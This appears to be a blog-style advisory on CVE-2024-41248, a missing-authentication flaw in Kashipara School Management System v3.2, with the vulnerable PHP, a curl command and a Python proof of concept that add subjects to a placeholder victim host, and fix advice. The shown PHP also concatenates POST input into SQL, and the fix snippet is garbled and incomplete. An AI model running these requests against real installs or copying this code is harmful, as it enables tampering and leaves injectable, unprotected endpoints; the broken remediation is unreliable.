CVE-2024-41248 - How Broken Access Control Lets Attackers Add Subjects in Kashipara Responsive School Management System v3.2.

In June 2024, a new vulnerability was found in a popular open-source web application called Kashipara Responsive School Management System (SMSA) version 3.2.. This vulnerability, tracked as CVE-2024-41248, allows anyone on the internet to add new subjects to the system — even if they’re not logged in! In this post, we’ll break down why this happens, show you the affected code, demonstrate a simple exploit, and offer some advice for staying safe.

What Is the Kashipara Responsive School Management System?

This software is a free PHP-based school management tool shared widely by students and small organizations on Kashipara.com. It promises features like adding students, staff management, subject management, etc.

The Vulnerability: Broken Access Control

In secure PHP projects, the rule of thumb is always to check if the user is authenticated or authorized before letting them do something important, like adding or deleting content. In SMSA v3.2., key PHP files add_subject.php (the add form) and add_subject_submit.php (the backend that actually saves new subjects) have no access control.

That means anyone, anywhere, can send data to these scripts — and the server will happily add new subjects for them.

Vulnerable Code Review

Let’s look at a simplified version of the code in add_subject_submit.php (based on the open-source release):

<?php
include('conn.php');

$subject_name = $_POST['subject_name'];
$subject_code = $_POST['subject_code'];

$sql = "INSERT INTO subjects (subject_name, subject_code) VALUES ('$subject_name', '$subject_code')";
if(mysqli_query($conn, $sql)){
    echo "Subject added successfully!";
} else {
    echo "Error: " . mysqli_error($conn);
}
?>

Notice:
- No session check: There’s no session_start() and no if(!isset($_SESSION['user'])){} to verify that the request is coming from a logged-in admin or teacher.

How To Exploit (Proof of Concept)

If you know the URL of a school's SMSA install, you can add a subject with a simple POST request.

Open your terminal and run

curl -X POST \
  -d "subject_name=HackedSubject&subject_code=HCK101" \
  http://victim-school.com/smsa/add_subject_submit.php

Result: The server responds "Subject added successfully!" and your entry appears in the subjects table, visible to everyone.

Proof Of Concept (Python)

import requests

url = 'http://victim-school.com/smsa/add_subject_submit.php'
data = {
    'subject_name': 'Hacked by CVE-2024-41248',
    'subject_code': 'CVE202441248'
}

r = requests.post(url, data=data)
print(r.text)

Disrupt learning: Teachers and staff might get confused by bogus subjects.

- Possibly escalate attacks: If they're able to trigger SQL injection or other vulnerabilities, they could go even further.

References

- Original Project on Kashipara
- CVE Record for CVE-2024-41248 (If not live, check NVD or Vuln aggregators soon)
- OWASP Broken Access Control

How To Fix

1. Require authentication before modification: At the top of both add_subject.php and add_subject_submit.php, add checks like:

die("Unauthorized access.");

}

`

2. Use CSRF tokens: To prevent automated attacks from other sites/scripts.

Summary

CVE-2024-41248 makes it trivial for bad actors to abuse Kashipara SMSA v3.2. by adding fake subjects, simply by visiting a URL or writing a few lines of code. If you use this application, restrict who can access add_subject.php and add_subject_submit.php, and update or patch your code as soon as possible.


Always remember: Just because a page isn’t “linked to” doesn’t mean it’s safe. If it accepts data or performs changes, guard it with authentication!

Timeline

Published on: 08/07/2024 16:15:45 UTC
Last modified on: 08/08/2024 15:07:27 UTC